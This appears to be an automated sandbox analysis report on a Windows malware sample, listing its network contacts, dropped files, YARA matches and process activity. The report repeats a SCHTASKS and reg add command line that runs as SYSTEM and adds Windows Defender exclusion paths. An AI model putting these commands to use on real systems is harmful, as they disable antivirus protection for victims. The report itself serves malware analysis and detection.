Source: svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000003.1379854194.000002336DE5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395625269.000002336DE59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: Gokod.763652.06.exe, aceprocted.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Gokod.763652.06.exe	String found in binary or memory: https://www.hawe.com/de-de/kontakt/kontaktsuche/)
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002w~
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/7-2476756634-1002
Source: Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xh4ffp.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49742 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.J8daaU.exe.1811f7d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 55.2.J8daaU.exe.2b875810000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen

PE file contains section with special chars

Source: eToken.dll.0.dr	Static PE information: section name: .QO
Source: eToken.dll.0.dr	Static PE information: section name: .{,3

Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE3CA9 NtAllocateVirtualMemory,		8_2_00007FF6FCAE3CA9
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE3CA9 NtAllocateVirtualMemory,		55_2_00007FF6FCAE3CA9

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE8178	8_2_00007FF6FCAE8178
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE9AE0	8_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE190C	8_2_00007FF6FCAE190C
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAEF908	8_2_00007FF6FCAEF908
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE8178	55_2_00007FF6FCAE8178
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE9AE0	55_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE190C	55_2_00007FF6FCAE190C
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAEF908	55_2_00007FF6FCAEF908
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_000002B873649095	55_2_000002B873649095

Source: C:\Users\user\Documents\J8daaU.exe	Code function: String function: 00007FF6FCAE3A79 appears 40 times
Source: C:\Users\user\Documents\J8daaU.exe	Code function: String function: 00007FF6FCAE1660 appears 44 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992

Source: Gokod.763652.06.exe, 00000000.00000000.1155742408.0000000140054000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameInstallShield SetupSuite.exe< vs Gokod.763652.06.exe
Source: Gokod.763652.06.exe	Binary or memory string: OriginalFilenameInstallShield SetupSuite.exe< vs Gokod.763652.06.exe
Source: Gokod.763652.06.exe	Binary or memory string: OriginalFilenamelibqb.dll@ vs Gokod.763652.06.exe
Source: Gokod.763652.06.exe	Binary or memory string: OriginalFilenameqtvirtualkeyboard_openwnn.dllp( vs Gokod.763652.06.exe
Source: Gokod.763652.06.exe	Binary or memory string: OriginalFilenameGoogleChromePortable_116.0.5845.111_online.paf.exe^ vs Gokod.763652.06.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f

Source: 8.2.J8daaU.exe.1811f7d0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 55.2.J8daaU.exe.2b875810000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender

Source: aceprocted.sys.0.dr	Binary string: \Device\Driver\
Source: aceprocted.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.evad.winEXE@84/35@2/3

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 55_2_000002B873644BE5 CreateToolhelp32Snapshot,

55_2_000002B873644BE5

Source: C:\Users\user\Documents\J8daaU.exe

File created: C:\Program Files (x86)\4xCNoe

Jump to behavior

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\i[1].dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_03
Source: C:\Users\user\Documents\J8daaU.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to behavior

Source: Gokod.763652.06.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\J8daaU.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Gokod.763652.06.exe	Virustotal: Detection: 16%
Source: Gokod.763652.06.exe	ReversingLabs: Detection: 16%

Source: Gokod.763652.06.exe	String found in binary or memory: e_LowerCaseLongPathFF-ADDF
Source: Gokod.763652.06.exe	String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

File read: C:\Users\user\Desktop\Gokod.763652.06.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Gokod.763652.06.exe "C:\Users\user\Desktop\Gokod.763652.06.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown	Process created: C:\Users\user\Documents\J8daaU.exe C:\Users\user\Documents\J8daaU.exe
Source: unknown	Process created: C:\Users\user\Documents\J8daaU.exe C:\Users\user\Documents\J8daaU.exe
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280
Source: unknown	Process created: C:\Users\user\Documents\J8daaU.exe C:\Users\user\Documents\J8daaU.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
